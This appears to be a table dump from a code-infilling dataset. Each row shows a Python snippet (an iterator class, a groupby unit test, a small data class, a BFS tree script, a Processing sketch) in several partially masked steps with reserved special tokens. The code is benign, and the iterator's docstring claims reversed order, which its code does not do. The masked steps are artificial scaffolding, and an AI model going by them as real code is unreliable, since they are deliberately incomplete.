code (string, lengths 13–6.09M) | order_type (string, 2 classes) | original_example (dict) | step_ids (list, lengths 1–5)
---|---|---|---|
class Wspak:
<|reserved_special_token_0|>
def __init__(self, data):
self.data = data
self.index = -2
self.i = len(data) - 1
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class Wspak:
"""Iterator zwracający wartości w odwróconym porządku"""
def __init__(self, data):
self.data = data
self.index = -2
self.i = len(data) - 1
def __iter__(self):
return self
def __next__(self):
if self.index >= self.i:
raise StopIteration
self.index = self.index + 2
return self.data[self.index]
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class Wspak:
"""Iterator zwracający wartości w odwróconym porządku"""
def __init__(self, data):
self.data = data
self.index = -2
self.i = len(data) - 1
def __iter__(self):
return self
def __next__(self):
if self.index >= self.i:
raise StopIteration
self.index = self.index + 2
return self.data[self.index]
<|reserved_special_token_0|>
for x in Wspak(g):
print(x)
print(d)
<|reserved_special_token_1|>
class Wspak:
"""Iterator zwracający wartości w odwróconym porządku"""
def __init__(self, data):
self.data = data
self.index = -2
self.i = len(data) - 1
def __iter__(self):
return self
def __next__(self):
if self.index >= self.i:
raise StopIteration
self.index = self.index + 2
return self.data[self.index]
d = ['sdasda', 'sdasdasd', 'sdsad232', 'dasda', 'dsada']
g = 2, 3, 4, 6, 7
d = [x for x in Wspak(d)]
for x in Wspak(g):
print(x)
print(d)
<|reserved_special_token_1|>
class Wspak:
"""Iterator zwracający wartości w odwróconym porządku"""
def __init__(self, data):
self.data = data
self.index = -2
self.i=len(data)-1
def __iter__(self):
return self
def __next__(self):
if self.index >= self.i:
raise StopIteration
self.index = self.index+2
return self.data[self.index]
d=(["sdasda","sdasdasd","sdsad232","dasda","dsada"])
g=(2,3,4,6,7)
d = [x for x in Wspak(d)]
for x in Wspak(g):
print(x)
print(d)
|
flexible
|
{
"blob_id": "ea1d62c4a8c406dde9bb138ee045be5e682fdbfe",
"index": 566,
"step-1": "class Wspak:\n <mask token>\n\n def __init__(self, data):\n self.data = data\n self.index = -2\n self.i = len(data) - 1\n <mask token>\n <mask token>\n\n\n<mask token>\n",
"step-2": "class Wspak:\n \"\"\"Iterator zwracający wartości w odwróconym porządku\"\"\"\n\n def __init__(self, data):\n self.data = data\n self.index = -2\n self.i = len(data) - 1\n\n def __iter__(self):\n return self\n\n def __next__(self):\n if self.index >= self.i:\n raise StopIteration\n self.index = self.index + 2\n return self.data[self.index]\n\n\n<mask token>\n",
"step-3": "class Wspak:\n \"\"\"Iterator zwracający wartości w odwróconym porządku\"\"\"\n\n def __init__(self, data):\n self.data = data\n self.index = -2\n self.i = len(data) - 1\n\n def __iter__(self):\n return self\n\n def __next__(self):\n if self.index >= self.i:\n raise StopIteration\n self.index = self.index + 2\n return self.data[self.index]\n\n\n<mask token>\nfor x in Wspak(g):\n print(x)\nprint(d)\n",
"step-4": "class Wspak:\n \"\"\"Iterator zwracający wartości w odwróconym porządku\"\"\"\n\n def __init__(self, data):\n self.data = data\n self.index = -2\n self.i = len(data) - 1\n\n def __iter__(self):\n return self\n\n def __next__(self):\n if self.index >= self.i:\n raise StopIteration\n self.index = self.index + 2\n return self.data[self.index]\n\n\nd = ['sdasda', 'sdasdasd', 'sdsad232', 'dasda', 'dsada']\ng = 2, 3, 4, 6, 7\nd = [x for x in Wspak(d)]\nfor x in Wspak(g):\n print(x)\nprint(d)\n",
"step-5": "class Wspak:\n \"\"\"Iterator zwracający wartości w odwróconym porządku\"\"\"\n def __init__(self, data):\n self.data = data\n self.index = -2\n self.i=len(data)-1\n\n def __iter__(self):\n return self\n def __next__(self):\n if self.index >= self.i:\n raise StopIteration\n self.index = self.index+2\n return self.data[self.index]\nd=([\"sdasda\",\"sdasdasd\",\"sdsad232\",\"dasda\",\"dsada\"])\ng=(2,3,4,6,7)\nd = [x for x in Wspak(d)]\nfor x in Wspak(g):\n print(x)\nprint(d)",
"step-ids": [
2,
5,
6,
7,
8
]
}
|
[
2,
5,
6,
7,
8
] |
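
An aside on the `Wspak` class in this row (an illustrative sketch, not a dataset row): its Polish docstring translates to "iterator returning values in reversed order", but because the index starts at -2 and advances by 2, iteration actually yields every second element in forward order. A minimal trace in plain Python 3:

```python
class Wspak:
    """Same logic as the row above (docstring translated: iterator returning
    values in reversed order -- which is not what the code does)."""
    def __init__(self, data):
        self.data = data
        self.index = -2
        self.i = len(data) - 1

    def __iter__(self):
        return self

    def __next__(self):
        if self.index >= self.i:
            raise StopIteration
        self.index = self.index + 2
        return self.data[self.index]

print(list(Wspak((2, 3, 4, 6, 7))))  # [2, 4, 7] -- forward order, every other element
```
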
<|reserved_special_token_0|>
class TestDictGroupBy(unittest.TestCase):
def setUp(self):
random.seed(0)
self.sut = dict_groupby
<|reserved_special_token_0|>
def generate_facility(self):
num_transactions = random.randint(1, 3)
transactions = {}
outstanding = 0
for i in range(num_transactions):
transactions[i] = self.generate_transaction()
outstanding += transactions[i]['outstanding']
return {'facility_type': random.choice(['a', 'b', 'c']),
'outstanding': outstanding, 'transactions': transactions}
<|reserved_special_token_0|>
def generate_record(self):
return {'gcol1': random.choice(['a', 'b', 'c']), 'gcol2': random.
choice(['a', 'b', 'c']), 'gcol3': random.choice(['a', 'b', 'c']
), 'vcol1': random.randint(0, 100), 'vcol2': random.random(),
'vcol3': random.randint(0, 2)}
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TestDictGroupBy(unittest.TestCase):
def setUp(self):
random.seed(0)
self.sut = dict_groupby
<|reserved_special_token_0|>
def generate_facility(self):
num_transactions = random.randint(1, 3)
transactions = {}
outstanding = 0
for i in range(num_transactions):
transactions[i] = self.generate_transaction()
outstanding += transactions[i]['outstanding']
return {'facility_type': random.choice(['a', 'b', 'c']),
'outstanding': outstanding, 'transactions': transactions}
def generate_facilities(self, num):
out = {}
for i in range(num):
out[i] = self.generate_facility()
return out
def generate_record(self):
return {'gcol1': random.choice(['a', 'b', 'c']), 'gcol2': random.
choice(['a', 'b', 'c']), 'gcol3': random.choice(['a', 'b', 'c']
), 'vcol1': random.randint(0, 100), 'vcol2': random.random(),
'vcol3': random.randint(0, 2)}
def test_hierarchical_groupby(self):
input_set = self.generate_facilities(4)
group_columns = ['facility_type', {'transactions': 'transaction_type'}]
print(input_set)
self.sut.DictGroupBy(input_set, group_columns)
def test_groupby_and_sum_speed(self):
data = {}
for i in range(100000):
data[i] = self.generate_record()
print('Generated data.')
group_columns = ['gcol1', 'gcol2', 'gcol3']
t0 = time.time()
gb = dict_groupby.GroupByObj(data, group_columns)
t1 = time.time()
out = gb.sum()
tf = time.time()
print(t1 - t0, tf - t1, tf - t0)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TestDictGroupBy(unittest.TestCase):
def setUp(self):
random.seed(0)
self.sut = dict_groupby
def generate_transaction(self):
return {'transaction_type': random.choice(['a', 'b', 'c']),
'outstanding': random.randint(0, 100)}
def generate_facility(self):
num_transactions = random.randint(1, 3)
transactions = {}
outstanding = 0
for i in range(num_transactions):
transactions[i] = self.generate_transaction()
outstanding += transactions[i]['outstanding']
return {'facility_type': random.choice(['a', 'b', 'c']),
'outstanding': outstanding, 'transactions': transactions}
def generate_facilities(self, num):
out = {}
for i in range(num):
out[i] = self.generate_facility()
return out
def generate_record(self):
return {'gcol1': random.choice(['a', 'b', 'c']), 'gcol2': random.
choice(['a', 'b', 'c']), 'gcol3': random.choice(['a', 'b', 'c']
), 'vcol1': random.randint(0, 100), 'vcol2': random.random(),
'vcol3': random.randint(0, 2)}
def test_hierarchical_groupby(self):
input_set = self.generate_facilities(4)
group_columns = ['facility_type', {'transactions': 'transaction_type'}]
print(input_set)
self.sut.DictGroupBy(input_set, group_columns)
def test_groupby_and_sum_speed(self):
data = {}
for i in range(100000):
data[i] = self.generate_record()
print('Generated data.')
group_columns = ['gcol1', 'gcol2', 'gcol3']
t0 = time.time()
gb = dict_groupby.GroupByObj(data, group_columns)
t1 = time.time()
out = gb.sum()
tf = time.time()
print(t1 - t0, tf - t1, tf - t0)
<|reserved_special_token_1|>
import random
import time
import unittest
from old import dict_groupby
class TestDictGroupBy(unittest.TestCase):
def setUp(self):
random.seed(0)
self.sut = dict_groupby
def generate_transaction(self):
return {'transaction_type': random.choice(['a', 'b', 'c']),
'outstanding': random.randint(0, 100)}
def generate_facility(self):
num_transactions = random.randint(1, 3)
transactions = {}
outstanding = 0
for i in range(num_transactions):
transactions[i] = self.generate_transaction()
outstanding += transactions[i]['outstanding']
return {'facility_type': random.choice(['a', 'b', 'c']),
'outstanding': outstanding, 'transactions': transactions}
def generate_facilities(self, num):
out = {}
for i in range(num):
out[i] = self.generate_facility()
return out
def generate_record(self):
return {'gcol1': random.choice(['a', 'b', 'c']), 'gcol2': random.
choice(['a', 'b', 'c']), 'gcol3': random.choice(['a', 'b', 'c']
), 'vcol1': random.randint(0, 100), 'vcol2': random.random(),
'vcol3': random.randint(0, 2)}
def test_hierarchical_groupby(self):
input_set = self.generate_facilities(4)
group_columns = ['facility_type', {'transactions': 'transaction_type'}]
print(input_set)
self.sut.DictGroupBy(input_set, group_columns)
def test_groupby_and_sum_speed(self):
data = {}
for i in range(100000):
data[i] = self.generate_record()
print('Generated data.')
group_columns = ['gcol1', 'gcol2', 'gcol3']
t0 = time.time()
gb = dict_groupby.GroupByObj(data, group_columns)
t1 = time.time()
out = gb.sum()
tf = time.time()
print(t1 - t0, tf - t1, tf - t0)
<|reserved_special_token_1|>
import random
import time
import unittest
from old import dict_groupby
class TestDictGroupBy(unittest.TestCase):
def setUp(self):
random.seed(0)
self.sut = dict_groupby
def generate_transaction(self):
return {
'transaction_type': random.choice(['a', 'b', 'c']),
'outstanding': random.randint(0, 100)
}
def generate_facility(self):
num_transactions = random.randint(1, 3)
transactions = {}
outstanding = 0
for i in range(num_transactions):
transactions[i] = self.generate_transaction()
outstanding += transactions[i]['outstanding']
return {
'facility_type': random.choice(['a', 'b', 'c']),
'outstanding': outstanding,
'transactions': transactions
}
def generate_facilities(self, num):
out = {}
for i in range(num):
out[i] = self.generate_facility()
return out
def generate_record(self):
return {
'gcol1': random.choice(['a', 'b', 'c']), 'gcol2': random.choice(['a', 'b', 'c']),
'gcol3': random.choice(['a', 'b', 'c']), 'vcol1': random.randint(0, 100), 'vcol2': random.random(),
'vcol3': random.randint(0, 2)
}
def test_hierarchical_groupby(self):
input_set = self.generate_facilities(4)
group_columns = ['facility_type', {'transactions': 'transaction_type'}]
print(input_set)
self.sut.DictGroupBy(input_set, group_columns)
def test_groupby_and_sum_speed(self):
data = {}
for i in range(100000):
data[i] = self.generate_record()
print('Generated data.')
group_columns = ['gcol1', 'gcol2', 'gcol3']
t0 = time.time()
gb = dict_groupby.GroupByObj(data, group_columns)
t1 = time.time()
out = gb.sum()
tf = time.time()
# print(out)
print(t1 - t0, tf - t1, tf - t0)
# df = pd.DataFrame(data).T
# t0 = time.time()
# df.groupby(group_columns).sum()
# tf = time.time()
# # print(out)
# print(tf - t0)
|
flexible
|
{
"blob_id": "f8e6f6e1be6c4ea306b7770c918b97808a0765b2",
"index": 6580,
"step-1": "<mask token>\n\n\nclass TestDictGroupBy(unittest.TestCase):\n\n def setUp(self):\n random.seed(0)\n self.sut = dict_groupby\n <mask token>\n\n def generate_facility(self):\n num_transactions = random.randint(1, 3)\n transactions = {}\n outstanding = 0\n for i in range(num_transactions):\n transactions[i] = self.generate_transaction()\n outstanding += transactions[i]['outstanding']\n return {'facility_type': random.choice(['a', 'b', 'c']),\n 'outstanding': outstanding, 'transactions': transactions}\n <mask token>\n\n def generate_record(self):\n return {'gcol1': random.choice(['a', 'b', 'c']), 'gcol2': random.\n choice(['a', 'b', 'c']), 'gcol3': random.choice(['a', 'b', 'c']\n ), 'vcol1': random.randint(0, 100), 'vcol2': random.random(),\n 'vcol3': random.randint(0, 2)}\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass TestDictGroupBy(unittest.TestCase):\n\n def setUp(self):\n random.seed(0)\n self.sut = dict_groupby\n <mask token>\n\n def generate_facility(self):\n num_transactions = random.randint(1, 3)\n transactions = {}\n outstanding = 0\n for i in range(num_transactions):\n transactions[i] = self.generate_transaction()\n outstanding += transactions[i]['outstanding']\n return {'facility_type': random.choice(['a', 'b', 'c']),\n 'outstanding': outstanding, 'transactions': transactions}\n\n def generate_facilities(self, num):\n out = {}\n for i in range(num):\n out[i] = self.generate_facility()\n return out\n\n def generate_record(self):\n return {'gcol1': random.choice(['a', 'b', 'c']), 'gcol2': random.\n choice(['a', 'b', 'c']), 'gcol3': random.choice(['a', 'b', 'c']\n ), 'vcol1': random.randint(0, 100), 'vcol2': random.random(),\n 'vcol3': random.randint(0, 2)}\n\n def test_hierarchical_groupby(self):\n input_set = self.generate_facilities(4)\n group_columns = ['facility_type', {'transactions': 'transaction_type'}]\n print(input_set)\n self.sut.DictGroupBy(input_set, group_columns)\n\n def test_groupby_and_sum_speed(self):\n data = {}\n for i in range(100000):\n data[i] = self.generate_record()\n print('Generated data.')\n group_columns = ['gcol1', 'gcol2', 'gcol3']\n t0 = time.time()\n gb = dict_groupby.GroupByObj(data, group_columns)\n t1 = time.time()\n out = gb.sum()\n tf = time.time()\n print(t1 - t0, tf - t1, tf - t0)\n",
"step-3": "<mask token>\n\n\nclass TestDictGroupBy(unittest.TestCase):\n\n def setUp(self):\n random.seed(0)\n self.sut = dict_groupby\n\n def generate_transaction(self):\n return {'transaction_type': random.choice(['a', 'b', 'c']),\n 'outstanding': random.randint(0, 100)}\n\n def generate_facility(self):\n num_transactions = random.randint(1, 3)\n transactions = {}\n outstanding = 0\n for i in range(num_transactions):\n transactions[i] = self.generate_transaction()\n outstanding += transactions[i]['outstanding']\n return {'facility_type': random.choice(['a', 'b', 'c']),\n 'outstanding': outstanding, 'transactions': transactions}\n\n def generate_facilities(self, num):\n out = {}\n for i in range(num):\n out[i] = self.generate_facility()\n return out\n\n def generate_record(self):\n return {'gcol1': random.choice(['a', 'b', 'c']), 'gcol2': random.\n choice(['a', 'b', 'c']), 'gcol3': random.choice(['a', 'b', 'c']\n ), 'vcol1': random.randint(0, 100), 'vcol2': random.random(),\n 'vcol3': random.randint(0, 2)}\n\n def test_hierarchical_groupby(self):\n input_set = self.generate_facilities(4)\n group_columns = ['facility_type', {'transactions': 'transaction_type'}]\n print(input_set)\n self.sut.DictGroupBy(input_set, group_columns)\n\n def test_groupby_and_sum_speed(self):\n data = {}\n for i in range(100000):\n data[i] = self.generate_record()\n print('Generated data.')\n group_columns = ['gcol1', 'gcol2', 'gcol3']\n t0 = time.time()\n gb = dict_groupby.GroupByObj(data, group_columns)\n t1 = time.time()\n out = gb.sum()\n tf = time.time()\n print(t1 - t0, tf - t1, tf - t0)\n",
"step-4": "import random\nimport time\nimport unittest\nfrom old import dict_groupby\n\n\nclass TestDictGroupBy(unittest.TestCase):\n\n def setUp(self):\n random.seed(0)\n self.sut = dict_groupby\n\n def generate_transaction(self):\n return {'transaction_type': random.choice(['a', 'b', 'c']),\n 'outstanding': random.randint(0, 100)}\n\n def generate_facility(self):\n num_transactions = random.randint(1, 3)\n transactions = {}\n outstanding = 0\n for i in range(num_transactions):\n transactions[i] = self.generate_transaction()\n outstanding += transactions[i]['outstanding']\n return {'facility_type': random.choice(['a', 'b', 'c']),\n 'outstanding': outstanding, 'transactions': transactions}\n\n def generate_facilities(self, num):\n out = {}\n for i in range(num):\n out[i] = self.generate_facility()\n return out\n\n def generate_record(self):\n return {'gcol1': random.choice(['a', 'b', 'c']), 'gcol2': random.\n choice(['a', 'b', 'c']), 'gcol3': random.choice(['a', 'b', 'c']\n ), 'vcol1': random.randint(0, 100), 'vcol2': random.random(),\n 'vcol3': random.randint(0, 2)}\n\n def test_hierarchical_groupby(self):\n input_set = self.generate_facilities(4)\n group_columns = ['facility_type', {'transactions': 'transaction_type'}]\n print(input_set)\n self.sut.DictGroupBy(input_set, group_columns)\n\n def test_groupby_and_sum_speed(self):\n data = {}\n for i in range(100000):\n data[i] = self.generate_record()\n print('Generated data.')\n group_columns = ['gcol1', 'gcol2', 'gcol3']\n t0 = time.time()\n gb = dict_groupby.GroupByObj(data, group_columns)\n t1 = time.time()\n out = gb.sum()\n tf = time.time()\n print(t1 - t0, tf - t1, tf - t0)\n",
"step-5": "import random\nimport time\nimport unittest\n\nfrom old import dict_groupby\n\n\nclass TestDictGroupBy(unittest.TestCase):\n\n def setUp(self):\n random.seed(0)\n self.sut = dict_groupby\n\n def generate_transaction(self):\n return {\n 'transaction_type': random.choice(['a', 'b', 'c']),\n 'outstanding': random.randint(0, 100)\n }\n\n def generate_facility(self):\n num_transactions = random.randint(1, 3)\n transactions = {}\n outstanding = 0\n for i in range(num_transactions):\n transactions[i] = self.generate_transaction()\n outstanding += transactions[i]['outstanding']\n\n return {\n 'facility_type': random.choice(['a', 'b', 'c']),\n 'outstanding': outstanding,\n 'transactions': transactions\n }\n\n def generate_facilities(self, num):\n out = {}\n for i in range(num):\n out[i] = self.generate_facility()\n return out\n\n def generate_record(self):\n return {\n 'gcol1': random.choice(['a', 'b', 'c']), 'gcol2': random.choice(['a', 'b', 'c']),\n 'gcol3': random.choice(['a', 'b', 'c']), 'vcol1': random.randint(0, 100), 'vcol2': random.random(),\n 'vcol3': random.randint(0, 2)\n }\n\n def test_hierarchical_groupby(self):\n input_set = self.generate_facilities(4)\n group_columns = ['facility_type', {'transactions': 'transaction_type'}]\n print(input_set)\n self.sut.DictGroupBy(input_set, group_columns)\n\n def test_groupby_and_sum_speed(self):\n data = {}\n for i in range(100000):\n data[i] = self.generate_record()\n print('Generated data.')\n group_columns = ['gcol1', 'gcol2', 'gcol3']\n\n t0 = time.time()\n gb = dict_groupby.GroupByObj(data, group_columns)\n t1 = time.time()\n out = gb.sum()\n tf = time.time()\n # print(out)\n print(t1 - t0, tf - t1, tf - t0)\n\n # df = pd.DataFrame(data).T\n # t0 = time.time()\n # df.groupby(group_columns).sum()\n # tf = time.time()\n # # print(out)\n # print(tf - t0)",
"step-ids": [
4,
7,
8,
9,
10
]
}
|
[
4,
7,
8,
9,
10
] |
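
The `dict_groupby` module imported in this row (`from old import dict_groupby`) is project-local and not included here, so the exact `GroupByObj` API is unknown. As a rough, hypothetical sketch of the behaviour `test_groupby_and_sum_speed` appears to exercise — group dict records by several key columns and sum the numeric columns — using only the standard library:

```python
from collections import defaultdict

def groupby_and_sum(data, group_columns, value_columns):
    # data: {record_id: {column: value}}, shaped like generate_record() output
    out = defaultdict(lambda: {v: 0 for v in value_columns})
    for record in data.values():
        key = tuple(record[c] for c in group_columns)
        for v in value_columns:
            out[key][v] += record[v]
    return dict(out)

records = {
    0: {'gcol1': 'a', 'gcol2': 'b', 'vcol1': 10, 'vcol2': 0.5},
    1: {'gcol1': 'a', 'gcol2': 'b', 'vcol1': 5, 'vcol2': 1.5},
    2: {'gcol1': 'c', 'gcol2': 'b', 'vcol1': 1, 'vcol2': 0.0},
}
print(groupby_and_sum(records, ['gcol1', 'gcol2'], ['vcol1', 'vcol2']))
# {('a', 'b'): {'vcol1': 15, 'vcol2': 2.0}, ('c', 'b'): {'vcol1': 1, 'vcol2': 0.0}}
```
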
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class SimulatorInfo(object):
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class SimulatorInfo(object):
def __init__(self, name=None, device_type=None, sdk=None, device_id=
None, sim_id=None):
self.name = name
self.device_type = device_type
self.sdk = sdk
self.device_id = device_id
self.sim_id = sim_id
|
flexible
|
{
"blob_id": "9b94e8aed2b0be2771a38cf2d1cf391772f3a9f0",
"index": 6478,
"step-1": "<mask token>\n",
"step-2": "class SimulatorInfo(object):\n <mask token>\n",
"step-3": "class SimulatorInfo(object):\n\n def __init__(self, name=None, device_type=None, sdk=None, device_id=\n None, sim_id=None):\n self.name = name\n self.device_type = device_type\n self.sdk = sdk\n self.device_id = device_id\n self.sim_id = sim_id\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
from collections import defaultdict, deque
N = int(input())
adj_list = defaultdict(list)
E = []
V_number = [None] * N
for _ in range(N - 1):
a, b = map(int, input().split())
E.append((a, b))
adj_list[a].append(b)
adj_list[b].append(a)
C = sorted(list(map(int, input().split())), reverse=True)
q = deque([1])
i = 0
while q:
v = q.popleft()
V_number[v - 1] = C[i]
i += 1
for u in adj_list[v]:
if V_number[u - 1] is None:
q.append(u)
print(sum(C[1:]))
print(*V_number)
|
normal
|
{
"blob_id": "b93f6c3192f8dd58b96dfdc6ea2b17e12cce34d0",
"index": 9752,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor _ in range(N - 1):\n a, b = map(int, input().split())\n E.append((a, b))\n adj_list[a].append(b)\n adj_list[b].append(a)\n<mask token>\nwhile q:\n v = q.popleft()\n V_number[v - 1] = C[i]\n i += 1\n for u in adj_list[v]:\n if V_number[u - 1] is None:\n q.append(u)\nprint(sum(C[1:]))\nprint(*V_number)\n",
"step-3": "<mask token>\nN = int(input())\nadj_list = defaultdict(list)\nE = []\nV_number = [None] * N\nfor _ in range(N - 1):\n a, b = map(int, input().split())\n E.append((a, b))\n adj_list[a].append(b)\n adj_list[b].append(a)\nC = sorted(list(map(int, input().split())), reverse=True)\nq = deque([1])\ni = 0\nwhile q:\n v = q.popleft()\n V_number[v - 1] = C[i]\n i += 1\n for u in adj_list[v]:\n if V_number[u - 1] is None:\n q.append(u)\nprint(sum(C[1:]))\nprint(*V_number)\n",
"step-4": "from collections import defaultdict, deque\nN = int(input())\nadj_list = defaultdict(list)\nE = []\nV_number = [None] * N\nfor _ in range(N - 1):\n a, b = map(int, input().split())\n E.append((a, b))\n adj_list[a].append(b)\n adj_list[b].append(a)\nC = sorted(list(map(int, input().split())), reverse=True)\nq = deque([1])\ni = 0\nwhile q:\n v = q.popleft()\n V_number[v - 1] = C[i]\n i += 1\n for u in adj_list[v]:\n if V_number[u - 1] is None:\n q.append(u)\nprint(sum(C[1:]))\nprint(*V_number)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
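
For illustration only (not a dataset row): the program in this row reads a tree and a list of values from stdin, sorts the values in descending order, assigns them to vertices in BFS order starting from vertex 1, and prints the sum of all values except the largest. The same assignment on a small hard-coded example, with hypothetical input values instead of stdin:

```python
from collections import defaultdict, deque

N = 4
edges = [(1, 2), (1, 3), (2, 4)]          # hypothetical sample tree
C = sorted([1, 2, 3, 4], reverse=True)    # [4, 3, 2, 1]

adj = defaultdict(list)
for a, b in edges:
    adj[a].append(b)
    adj[b].append(a)

numbers = [None] * N
q = deque([1])
i = 0
while q:
    v = q.popleft()
    numbers[v - 1] = C[i]   # largest remaining value goes to the next BFS vertex
    i += 1
    for u in adj[v]:
        if numbers[u - 1] is None:
            q.append(u)

print(sum(C[1:]))   # 6  (all values except the largest)
print(*numbers)     # 4 3 2 1  (vertex 1 gets the largest, then BFS order)
```
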
# PDE:
# add_library('hype')
# processing.py:
from hype.core.util import H
from hype.core.interfaces import HCallback
from hype.extended.behavior import HOscillator
from hype.extended.drawable import HCanvas, HRect
from hype.extended.layout import HGridLayout
from hype.extended.util import HDrawablePool
from random import choice
rectRadius = 50
numSquares = 25
canvas = None
pool = None
color1 = 0x406B2B24 # #6B2B24
color2 = 0xc4831521 # #831521
def setup():
global canvas, pool
size(568, 568)
H.init(this).background(0xffE0DFE2) # #E0DFE2
smooth()
canvas = H.add(HCanvas()).autoClear(False).fade(5)
pool = HDrawablePool(numSquares)
pool.autoParent(canvas)\
.add(HRect()
.size(rectRadius * 2)
.noStroke())\
.layout(HGridLayout()
.startLoc(rectRadius * 2 - 20, rectRadius * 2 - 20)
.spacing(rectRadius * 2 + 1, rectRadius * 2 + 1)
.cols(5))\
.onCreate(Callback())\
.requestAll()
def draw():
H.drawStage()
class Callback(HCallback):
def __init__(self):
pass
@staticmethod
def run(drawable):
drawable.anchorAt(H.CENTER)\
.fill(choice([color1, color2]))
HOscillator()\
.target(drawable)\
.property(H.ROTATION)\
.range(-5, 5)\
.speed(1)\
.freq(4)\
.currentStep(pool.currentIndex() * random(2, 25))
|
normal
|
{
"blob_id": "b8a41c56a31acab0181ec364f76010ac12119074",
"index": 5489,
"step-1": "<mask token>\n\n\nclass Callback(HCallback):\n\n def __init__(self):\n pass\n\n @staticmethod\n def run(drawable):\n drawable.anchorAt(H.CENTER).fill(choice([color1, color2]))\n HOscillator().target(drawable).property(H.ROTATION).range(-5, 5).speed(\n 1).freq(4).currentStep(pool.currentIndex() * random(2, 25))\n",
"step-2": "<mask token>\n\n\ndef setup():\n global canvas, pool\n size(568, 568)\n H.init(this).background(4292927458)\n smooth()\n canvas = H.add(HCanvas()).autoClear(False).fade(5)\n pool = HDrawablePool(numSquares)\n pool.autoParent(canvas).add(HRect().size(rectRadius * 2).noStroke()\n ).layout(HGridLayout().startLoc(rectRadius * 2 - 20, rectRadius * 2 -\n 20).spacing(rectRadius * 2 + 1, rectRadius * 2 + 1).cols(5)).onCreate(\n Callback()).requestAll()\n\n\ndef draw():\n H.drawStage()\n\n\nclass Callback(HCallback):\n\n def __init__(self):\n pass\n\n @staticmethod\n def run(drawable):\n drawable.anchorAt(H.CENTER).fill(choice([color1, color2]))\n HOscillator().target(drawable).property(H.ROTATION).range(-5, 5).speed(\n 1).freq(4).currentStep(pool.currentIndex() * random(2, 25))\n",
"step-3": "<mask token>\nrectRadius = 50\nnumSquares = 25\ncanvas = None\npool = None\ncolor1 = 1080765220\ncolor2 = 3296924961\n\n\ndef setup():\n global canvas, pool\n size(568, 568)\n H.init(this).background(4292927458)\n smooth()\n canvas = H.add(HCanvas()).autoClear(False).fade(5)\n pool = HDrawablePool(numSquares)\n pool.autoParent(canvas).add(HRect().size(rectRadius * 2).noStroke()\n ).layout(HGridLayout().startLoc(rectRadius * 2 - 20, rectRadius * 2 -\n 20).spacing(rectRadius * 2 + 1, rectRadius * 2 + 1).cols(5)).onCreate(\n Callback()).requestAll()\n\n\ndef draw():\n H.drawStage()\n\n\nclass Callback(HCallback):\n\n def __init__(self):\n pass\n\n @staticmethod\n def run(drawable):\n drawable.anchorAt(H.CENTER).fill(choice([color1, color2]))\n HOscillator().target(drawable).property(H.ROTATION).range(-5, 5).speed(\n 1).freq(4).currentStep(pool.currentIndex() * random(2, 25))\n",
"step-4": "from hype.core.util import H\nfrom hype.core.interfaces import HCallback\nfrom hype.extended.behavior import HOscillator\nfrom hype.extended.drawable import HCanvas, HRect\nfrom hype.extended.layout import HGridLayout\nfrom hype.extended.util import HDrawablePool\nfrom random import choice\nrectRadius = 50\nnumSquares = 25\ncanvas = None\npool = None\ncolor1 = 1080765220\ncolor2 = 3296924961\n\n\ndef setup():\n global canvas, pool\n size(568, 568)\n H.init(this).background(4292927458)\n smooth()\n canvas = H.add(HCanvas()).autoClear(False).fade(5)\n pool = HDrawablePool(numSquares)\n pool.autoParent(canvas).add(HRect().size(rectRadius * 2).noStroke()\n ).layout(HGridLayout().startLoc(rectRadius * 2 - 20, rectRadius * 2 -\n 20).spacing(rectRadius * 2 + 1, rectRadius * 2 + 1).cols(5)).onCreate(\n Callback()).requestAll()\n\n\ndef draw():\n H.drawStage()\n\n\nclass Callback(HCallback):\n\n def __init__(self):\n pass\n\n @staticmethod\n def run(drawable):\n drawable.anchorAt(H.CENTER).fill(choice([color1, color2]))\n HOscillator().target(drawable).property(H.ROTATION).range(-5, 5).speed(\n 1).freq(4).currentStep(pool.currentIndex() * random(2, 25))\n",
"step-5": "# PDE:\n# add_library('hype')\n# processing.py:\nfrom hype.core.util import H\nfrom hype.core.interfaces import HCallback\nfrom hype.extended.behavior import HOscillator\nfrom hype.extended.drawable import HCanvas, HRect\nfrom hype.extended.layout import HGridLayout\nfrom hype.extended.util import HDrawablePool\n\nfrom random import choice\n\n\nrectRadius = 50\nnumSquares = 25\ncanvas = None\npool = None\ncolor1 = 0x406B2B24 # #6B2B24\ncolor2 = 0xc4831521 # #831521\n\n\ndef setup():\n global canvas, pool\n size(568, 568)\n H.init(this).background(0xffE0DFE2) # #E0DFE2\n smooth()\n canvas = H.add(HCanvas()).autoClear(False).fade(5)\n pool = HDrawablePool(numSquares)\n pool.autoParent(canvas)\\\n .add(HRect()\n .size(rectRadius * 2)\n .noStroke())\\\n .layout(HGridLayout()\n .startLoc(rectRadius * 2 - 20, rectRadius * 2 - 20)\n .spacing(rectRadius * 2 + 1, rectRadius * 2 + 1)\n .cols(5))\\\n .onCreate(Callback())\\\n .requestAll()\n\n\ndef draw():\n H.drawStage()\n\n\nclass Callback(HCallback):\n def __init__(self):\n pass\n\n @staticmethod\n def run(drawable):\n drawable.anchorAt(H.CENTER)\\\n .fill(choice([color1, color2]))\n HOscillator()\\\n .target(drawable)\\\n .property(H.ROTATION)\\\n .range(-5, 5)\\\n .speed(1)\\\n .freq(4)\\\n .currentStep(pool.currentIndex() * random(2, 25))\n",
"step-ids": [
3,
5,
6,
7,
8
]
}
|
[
3,
5,
6,
7,
8
] |
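
The sketch in this row needs the Processing environment (and the `hype` library) to run, so it is not reproduced here. One small detail it relies on: the packed hex colours carry an alpha byte in front of the RGB value noted in the comments. A plain-Python helper (hypothetical, not part of the row) that unpacks them:

```python
# Unpack a 32-bit ARGB colour into (alpha, red, green, blue) components.
def argb(c):
    return (c >> 24) & 0xFF, (c >> 16) & 0xFF, (c >> 8) & 0xFF, c & 0xFF

print(argb(0x406B2B24))  # (64, 107, 43, 36)   -> #6B2B24 at ~25% alpha
print(argb(0xC4831521))  # (196, 131, 21, 33)  -> #831521 at ~77% alpha
```
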
<|reserved_special_token_0|>
